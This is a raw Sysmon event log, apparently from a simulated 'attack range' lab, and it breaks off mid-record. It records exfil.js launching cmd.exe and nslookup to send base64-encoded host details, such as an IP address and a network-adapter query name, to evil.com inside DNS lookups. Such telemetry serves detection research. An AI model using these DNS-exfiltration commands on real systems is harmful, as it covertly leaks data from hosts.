14:16:36.160{2E1864BB-17A1-629A-783D-000000005F02}55527792C:\Windows\System32\WScript.exe{2E1864BB-17C4-629A-F540-000000005F02}3300C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.160{2E1864BB-17C4-629A-F540-000000005F02}3300C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllflds.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.145{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmfa.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.127{2E1864BB-17C4-629A-F340-000000005F02}7628436C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-F440-000000005F02}5416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.123{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-F440-000000005F02}5416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.123{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.123{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.123{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.123{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.122{2E1864BB-17C4-629A-F240-000000005F02}35882820C:\Windows\system32\cmd.exe{2E1864BB-17C4-629A-F440-000000005F02}5416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.122{2E1864BB-17C4-629A-F440-000000005F02}5416C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C4-629A-F240-000000005F02}3588C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmfa.tmp 2>&1 10341000x8000000000000000201661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.091{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-F340-000000005F02}7628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.091{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-F340-000000005F02}7628C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.091{2E1864BB-17C4-629A-F340-000000005F02}7628436C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-F240-000000005F02}3588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.075{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-F340-000000005F02}7628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.060{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.060{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.060{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.060{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.060{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-F240-000000005F02}3588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.060{2E1864BB-17A1-629A-783D-000000005F02}55521660C:\Windows\System32\WScript.exe{2E1864BB-17C4-629A-F240-000000005F02}3588C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.060{2E1864BB-17C4-629A-F240-000000005F02}3588C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmfa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.044{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbabb.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.007{2E1864BB-17C3-629A-F040-000000005F02}25207656C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-F140-000000005F02}6396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.007{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.007{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.007{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.007{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.007{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-F140-000000005F02}6396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.007{2E1864BB-17C3-629A-EF40-000000005F02}7328132C:\Windows\system32\cmd.exe{2E1864BB-17C4-629A-F140-000000005F02}6396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.015{2E1864BB-17C4-629A-F140-000000005F02}6396C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C3-629A-EF40-000000005F02}732C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbabb.tmp 2>&1 23542300x800000000000000043945Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:36.297{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 